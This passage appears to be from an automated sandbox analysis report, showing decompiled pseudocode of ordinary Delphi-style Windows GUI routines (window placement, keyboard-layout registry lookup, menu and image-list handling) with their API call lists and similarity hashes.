                                                                        								}
                                                                        							} else {
                                                                        								_t141[4] = _t60;
                                                                        							}
                                                                        							E00472AA4(_t145, _t141[4]);
                                                                        						}
                                                                        					} else {
                                                                        						_t64 = _t56 - 2;
                                                                        						if(_t64 == 0) {
                                                                        							_t66 = E00477D88(_t112,  *((intOrPtr*)(_t124 + 0xc)));
                                                                        							E00472AA4(_t66, E00426D20(E0043CC2C(_t112),  *((intOrPtr*)(_t124 + 0xc))));
                                                                        							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								 *((intOrPtr*)( *_t112 + 0x7c))();
                                                                        							}
                                                                        						} else {
                                                                        							if(_t64 == 0x12c) {
                                                                        								_push(E004072A4(GetMessagePos()) & 0x0000ffff);
                                                                        								_t80 = GetMessagePos();
                                                                        								_pop(_t132);
                                                                        								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
                                                                        								E004360F0(_t112,  &_v40,  &_v12);
                                                                        								_push(_v40.y);
                                                                        								_t148 = ChildWindowFromPoint(E0043CC2C(_t112), _v40.x);
                                                                        								__eflags = _t148;
                                                                        								if(_t148 != 0) {
                                                                        									_t89 = E0043CC2C(_t112);
                                                                        									__eflags = _t148 - _t89;
                                                                        									if(_t148 != _t89) {
                                                                        										E00404984( &_v16, 0x50);
                                                                        										_t93 = E00404600(_v16);
                                                                        										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
                                                                        										E00404744(_v16, "SysHeader32");
                                                                        										if(__eflags == 0) {
                                                                        											E004360F0(_t112,  &_v40,  &_v12);
                                                                        											_v32 = _v40;
                                                                        											_v28 = _v40.y;
                                                                        											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
                                                                        											__eflags = _t106;
                                                                        											if(_t106 >= 0) {
                                                                        												E00477D88(_t112, _v20);
                                                                        												E004037D8(_t112, __eflags);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetMessagePos.USER32 ref: 00475443
                                                                        • GetMessagePos.USER32 ref: 00475451
                                                                        • ChildWindowFromPoint.USER32 ref: 0047547D
                                                                        • GetClassNameA.USER32(00000000,00000000,00000000), ref: 004754BB
                                                                        • SendMessageA.USER32 ref: 004754FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Message$ChildClassFromNamePointSendWindow
                                                                        • String ID: SysHeader32
                                                                        • API String ID: 2510305242-2725536604
                                                                        • Opcode ID: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction ID: 9da0523838ad94a5aacdfd7dfe65334668b87c58a187b1523fb11523a5177e66
                                                                        • Opcode Fuzzy Hash: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction Fuzzy Hash: FA517F70B009056BCB10EF79D9819EEB3E5AF48304B50C17AB819EB356DB7CED058798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0043E178(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr* _v8;
                                                                        				void _v12;
                                                                        				intOrPtr _v16;
                                                                        				int _v24;
                                                                        				int _v28;
                                                                        				intOrPtr _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t85;
                                                                        				void* _t113;
                                                                        				intOrPtr _t129;
                                                                        				intOrPtr _t138;
                                                                        				void* _t141;
                                                                        
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t113 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t138 =  *0x495c2c; // 0x496c08
                                                                        				 *((char*)(_v8 + 0x210)) = 1;
                                                                        				_push(_t141);
                                                                        				_push(0x43e33f);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t141 + 0xffffffe0;
                                                                        				E004365DC(_v8, __ecx, __ecx, _t138);
                                                                        				_v16 = _v16 + 4;
                                                                        				E00437804(_v8,  &_v28);
                                                                        				if(E004541C8() <  *(_v8 + 0x4c) + _v24) {
                                                                        					_v24 = E004541C8() -  *(_v8 + 0x4c);
                                                                        				}
                                                                        				if(E004541D4() <  *(_v8 + 0x48) + _v28) {
                                                                        					_v28 = E004541D4() -  *(_v8 + 0x48);
                                                                        				}
                                                                        				if(E004541BC() > _v28) {
                                                                        					_v28 = E004541BC();
                                                                        				}
                                                                        				if(E004541B0() > _v16) {
                                                                        					_v16 = E004541B0();
                                                                        				}
                                                                        				SetWindowPos(E0043CC2C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                        				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x47a8a8 != 0) {
                                                                        					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                        					if(_v12 != 0) {
                                                                        						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                        						if(_v12 == 0) {
                                                                        							E004413CC( &_v36);
                                                                        							if(_v32 <= _v24) {
                                                                        							}
                                                                        						}
                                                                        						 *0x47a8a8(E0043CC2C(_v8), 0x64,  *0x0047A9B0 | 0x00040000);
                                                                        					}
                                                                        				}
                                                                        				ShowWindow(E0043CC2C(_v8), 4);
                                                                        				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                        				_pop(_t129);
                                                                        				 *[fs:eax] = _t129;
                                                                        				_push(0x43e346);
                                                                        				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                        				_t85 = _v8;
                                                                        				 *((char*)(_t85 + 0x210)) = 0;
                                                                        				return _t85;
                                                                        			}
















                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E25D
                                                                        • GetTickCount.KERNEL32 ref: 0043E262
                                                                        • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043E29D
                                                                        • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043E2B5
                                                                        • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043E2FB
                                                                        • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E30C
                                                                        • GetTickCount.KERNEL32 ref: 0043E326
                                                                          • Part of subcall function 004413CC: GetCursorPos.USER32(?), ref: 004413D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                        • String ID:
                                                                        • API String ID: 3024527889-0
                                                                        • Opcode ID: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction ID: 7261888abba92b40dc426993c3f0a1dc2aaa4b26281b0a3ad08c4c814d8d1b3d
                                                                        • Opcode Fuzzy Hash: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction Fuzzy Hash: 9D516474A00105EFDB10EFA9C985A9EB7F5EF49304F2045AAF500EB391D775AE80CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00454414(intOrPtr __eax, void* __ebx) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				char _v20;
                                                                        				void* _v24;
                                                                        				struct HKL__* _v280;
                                                                        				char _v536;
                                                                        				char _v600;
                                                                        				char _v604;
                                                                        				char _v608;
                                                                        				char _v612;
                                                                        				void* _t60;
                                                                        				intOrPtr _t106;
                                                                        				intOrPtr _t111;
                                                                        				void* _t117;
                                                                        				void* _t118;
                                                                        				intOrPtr _t119;
                                                                        
                                                                        				_t117 = _t118;
                                                                        				_t119 = _t118 + 0xfffffda0;
                                                                        				_v612 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t117);
                                                                        				_push(0x4545bf);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t119;
                                                                        				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                                        					L11:
                                                                        					_pop(_t106);
                                                                        					 *[fs:eax] = _t106;
                                                                        					_push(0x4545c6);
                                                                        					return E00404348( &_v612);
                                                                        				} else {
                                                                        					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
                                                                        					E00404348(_v8 + 0x38);
                                                                        					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                                        					if(_t60 < 0) {
                                                                        						L10:
                                                                        						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                                        						E00416868( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                                        						goto L11;
                                                                        					} else {
                                                                        						_v20 = _t60 + 1;
                                                                        						_v24 =  &_v280;
                                                                        						do {
                                                                        							if(E0044183C( *_v24) == 0) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								_v608 =  *_v24;
                                                                        								_v604 = 0;
                                                                        								if(RegOpenKeyExA(0x80000002, E004092EC( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									_push(_t117);
                                                                        									_push(0x45457b);
                                                                        									_push( *[fs:eax]);
                                                                        									 *[fs:eax] = _t119;
                                                                        									_v12 = 0x100;
                                                                        									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                                        										E004045B0( &_v612, 0x100,  &_v536);
                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                                        										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                                        											E004045B0(_v8 + 0x38, 0x100,  &_v536);
                                                                        										}
                                                                        									}
                                                                        									_pop(_t111);
                                                                        									 *[fs:eax] = _t111;
                                                                        									_push(0x454582);
                                                                        									return RegCloseKey(_v16);
                                                                        								}
                                                                        							}
                                                                        							goto L12;
                                                                        							L9:
                                                                        							_v24 = _v24 + 4;
                                                                        							_t38 =  &_v20;
                                                                        							 *_t38 = _v20 - 1;
                                                                        						} while ( *_t38 != 0);
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        				L12:
                                                                        			}





















                                                                        APIs
                                                                        • GetKeyboardLayoutList.USER32(00000040,?,00000000,004545BF,?,0217094C,?,00454621,00000000,?,00438B67), ref: 0045446A
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004544D2
                                                                        • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 0045450C
                                                                        • RegCloseKey.ADVAPI32(?,00454582,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 00454575
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004544BC
                                                                        • layout text, xrefs: 00454503
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 1703357764-2652665750
                                                                        • Opcode ID: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction ID: 2539a2497d52caec4cc5f2bae2980b59186013e12a04a0a3c27255b3f8e2aff6
                                                                        • Opcode Fuzzy Hash: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction Fuzzy Hash: 3D414174A0020DAFDB10DF55C981B9EB7F8EB88704F5144A6EA04EB352E734EE44DB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E0042326C(void* __eax, void* __edx) {
                                                                        				BYTE* _v8;
                                                                        				int _v12;
                                                                        				struct HDC__* _v16;
                                                                        				short _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				char _v38;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t35;
                                                                        				void* _t66;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t78;
                                                                        				void* _t81;
                                                                        				void* _t84;
                                                                        				void* _t86;
                                                                        				intOrPtr _t87;
                                                                        
                                                                        				_t84 = _t86;
                                                                        				_t87 = _t86 + 0xffffffdc;
                                                                        				_t81 = __edx;
                                                                        				_t66 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					E00402EF0( &_v38, 0x16);
                                                                        					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                                                                        					_v38 = 0x9ac6cdd7;
                                                                        					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                                                                        					if(_t35 != 0) {
                                                                        						_v24 = _t35;
                                                                        					} else {
                                                                        						_v24 = 0x60;
                                                                        					}
                                                                        					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                                        					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                                        					_v18 = E00421870( &_v38);
                                                                        					_v16 = GetDC(0);
                                                                        					_push(_t84);
                                                                        					_push(0x4233a7);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t87;
                                                                        					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                                                                        					_v8 = E00402754(_v12);
                                                                        					_push(_t84);
                                                                        					_push(0x423387);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t87;
                                                                        					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                                        						E00420A80(_t68);
                                                                        					}
                                                                        					E00416B7C(_t81, 0x16,  &_v38);
                                                                        					E00416B7C(_t81, _v12, _v8);
                                                                        					_pop(_t78);
                                                                        					 *[fs:eax] = _t78;
                                                                        					_push(E0042338E);
                                                                        					return E00402774(_v8);
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232BE
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232D5
                                                                        • GetDC.USER32(00000000), ref: 004232EC
                                                                        • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004233A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423310
                                                                        • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00423387,?,?,00000000,00000000,00000008,?,00000000,004233A7), ref: 00423343
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: BitsFileMeta
                                                                        • String ID: `
                                                                        • API String ID: 858000408-2679148245
                                                                        • Opcode ID: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction ID: 3839b95b636f5826239c880ae12cce9acd53ea68cca29137c77ea4b08317ef11
                                                                        • Opcode Fuzzy Hash: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction Fuzzy Hash: 7D314775B00258ABDB00DFD5D881AAEB7B8EF08704F514096F904EB291D6789E40D7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0041C0B0() {
                                                                        				char _v5;
                                                                        				intOrPtr* _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t16;
                                                                        				char _t19;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t34;
                                                                        				void* _t39;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr* _t47;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t51;
                                                                        				void* _t53;
                                                                        				void* _t55;
                                                                        				void* _t58;
                                                                        				void* _t60;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t58 = _t60;
                                                                        				_t61 = _t60 + 0xfffffff0;
                                                                        				_push(_t39);
                                                                        				_push(_t55);
                                                                        				_push(_t53);
                                                                        				_t16 = GetCurrentThreadId();
                                                                        				_t47 =  *0x495c4c; // 0x496030
                                                                        				if(_t16 !=  *_t47) {
                                                                        					_v20 = GetCurrentThreadId();
                                                                        					_v16 = 0;
                                                                        					_t46 =  *0x495acc; // 0x410438
                                                                        					E0040A274(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				if( *0x496a00 == 0) {
                                                                        					_v5 = 0;
                                                                        					return _v5;
                                                                        				} else {
                                                                        					_push(0x496a04);
                                                                        					L004068AC();
                                                                        					_push(_t58);
                                                                        					_push(0x41c1c6);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t61;
                                                                        					if( *0x47a4b8 == 0) {
                                                                        						L5:
                                                                        						_t19 = 0;
                                                                        					} else {
                                                                        						_t34 =  *0x47a4b8; // 0x0
                                                                        						if( *((intOrPtr*)(_t34 + 8)) > 0) {
                                                                        							_t19 = 1;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        					}
                                                                        					_v5 = _t19;
                                                                        					if(_v5 != 0) {
                                                                        						while(1) {
                                                                        							_t21 =  *0x47a4b8; // 0x0
                                                                        							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t22 =  *0x47a4b8; // 0x0
                                                                        							_v12 = E00414208(_t22, 0);
                                                                        							_t24 =  *0x47a4b8; // 0x0
                                                                        							E004140F8(_t24, 0);
                                                                        							 *[fs:eax] = _t61;
                                                                        							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c179, _t58);
                                                                        							_pop(_t51);
                                                                        							 *[fs:eax] = _t51;
                                                                        							SetEvent( *(_v12 + 4));
                                                                        						}
                                                                        						 *0x496a00 = 0;
                                                                        					}
                                                                        					_pop(_t48);
                                                                        					 *[fs:eax] = _t48;
                                                                        					_push(E0041C1D1);
                                                                        					_push(0x496a04);
                                                                        					L004069F4();
                                                                        					return 0;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0B9
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0C8
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A04,?,?,00000000), ref: 0041C103
                                                                        • SetEvent.KERNEL32(?,?,00496A04,?,?,00000000), ref: 0041C197
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A04,0041C1D1,00496A04,?,?,00000000), ref: 0041C1C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                        • String ID: 0`I
                                                                        • API String ID: 130076905-2983702033
                                                                        • Opcode ID: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction ID: d3fc0090a8b2a4d8759e39c8523565b2f55ac54e1dab5fd3bc4b06f7a5c1992e
                                                                        • Opcode Fuzzy Hash: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction Fuzzy Hash: 53314634284240AFD701DB64DC85BAE7BE4EB4A314F2680BBE405936A2C77D58D5CB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004467FC(int __eax, void* __edx) {
                                                                        				signed int _t39;
                                                                        				signed int _t40;
                                                                        				intOrPtr _t44;
                                                                        				int _t46;
                                                                        				int _t47;
                                                                        				intOrPtr* _t48;
                                                                        
                                                                        				_t18 = __eax;
                                                                        				_t48 = __eax;
                                                                        				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                                        					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                                        						 *((char*)(__eax + 0x74)) = 1;
                                                                        						return __eax;
                                                                        					}
                                                                        					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                                                        					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                                                        						return E004467FC(_t19, __edx);
                                                                        					}
                                                                        					_t18 = GetMenuItemCount(E0044692C(__eax));
                                                                        					_t47 = _t18;
                                                                        					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                                                        					while(_t47 > 0) {
                                                                        						_t46 = _t47 - 1;
                                                                        						_t18 = GetMenuState(E0044692C(_t48), _t46, 0x400);
                                                                        						if((_t18 & 0x00000004) == 0) {
                                                                        							_t18 = RemoveMenu(E0044692C(_t48), _t46, 0x400);
                                                                        							_t40 = 1;
                                                                        						}
                                                                        						_t47 = _t47 - 1;
                                                                        					}
                                                                        					if(_t40 != 0) {
                                                                        						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                                                        							L14:
                                                                        							E004466C8(_t48);
                                                                        							L15:
                                                                        							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                                                        						}
                                                                        						_t44 =  *0x44531c; // 0x445368
                                                                        						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044692C(_t48)) != 0) {
                                                                        							goto L14;
                                                                        						} else {
                                                                        							DestroyMenu( *(_t48 + 0x34));
                                                                        							 *(_t48 + 0x34) = 0;
                                                                        							goto L15;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t18;
                                                                        			}










                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hSD
                                                                        • API String ID: 0-1503840404
                                                                        • Opcode ID: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction ID: ba21534d86675a3933ba5c7ede87d647a4094e5fe0645c481f54663c532360df
                                                                        • Opcode Fuzzy Hash: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction Fuzzy Hash: D2117871A0260596FB50BF3A9C0575B7B989F43749F06442BBC01A7387CA7DCC09865F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 31%
                                                                        			E0043E484(void* __eax) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v16;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr* _t17;
                                                                        				char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t26;
                                                                        				void* _t28;
                                                                        				intOrPtr _t37;
                                                                        				void* _t39;
                                                                        				intOrPtr _t47;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t49 = _t51;
                                                                        				_t52 = _t51 + 0xfffffff4;
                                                                        				_t39 = __eax;
                                                                        				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					_t14 =  *0x495998; // 0x496a9c
                                                                        					_t17 =  *0x495998; // 0x496a9c
                                                                        					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                                                        					_push(_t19);
                                                                        					L00426A90();
                                                                        					_v8 = _t19;
                                                                        					_push(_t49);
                                                                        					_push(0x43e544);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t52;
                                                                        					_t21 =  *0x495c2c; // 0x496c08
                                                                        					_t23 = E0045469C( *_t21,  *((short*)(__eax + 0x68)));
                                                                        					_t4 =  &_v8; // 0x434646
                                                                        					E00426AC8( *_t4, _t23);
                                                                        					_t26 =  *0x495c2c; // 0x496c08
                                                                        					_t28 = E0045469C( *_t26,  *((short*)(_t39 + 0x68)));
                                                                        					_t6 =  &_v8; // 0x434646
                                                                        					E00426AC8( *_t6, _t28);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t7 =  &_v8; // 0x434646
                                                                        					_push( *_t7);
                                                                        					L00426B20();
                                                                        					_push( &_v16);
                                                                        					_push(0);
                                                                        					L00426B30();
                                                                        					_push(_v12);
                                                                        					_push(_v16);
                                                                        					_push(1);
                                                                        					_t11 =  &_v8; // 0x434646
                                                                        					_push( *_t11);
                                                                        					L00426B20();
                                                                        					_pop(_t47);
                                                                        					 *[fs:eax] = _t47;
                                                                        					_push(0x43e54b);
                                                                        					_t12 =  &_v8; // 0x434646
                                                                        					_t37 =  *_t12;
                                                                        					_push(_t37);
                                                                        					L00426A98();
                                                                        					return _t37;
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • 73451AB0.COMCTL32(00000000), ref: 0043E4B6
                                                                          • Part of subcall function 00426AC8: 73452140.COMCTL32(FFC,000000FF,00000000,0043E4E6,00000000,0043E544,?,00000000), ref: 00426ACC
                                                                        • 73451680.COMCTL32(FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E50A
                                                                        • 73451710.COMCTL32(00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E515
                                                                        • 73451680.COMCTL32(FFC,00000001,?,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E528
                                                                        • 73451F60.COMCTL32(FFC,0043E54B,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E53E
                                                                        Strings
                                                                        Memory Dump Source
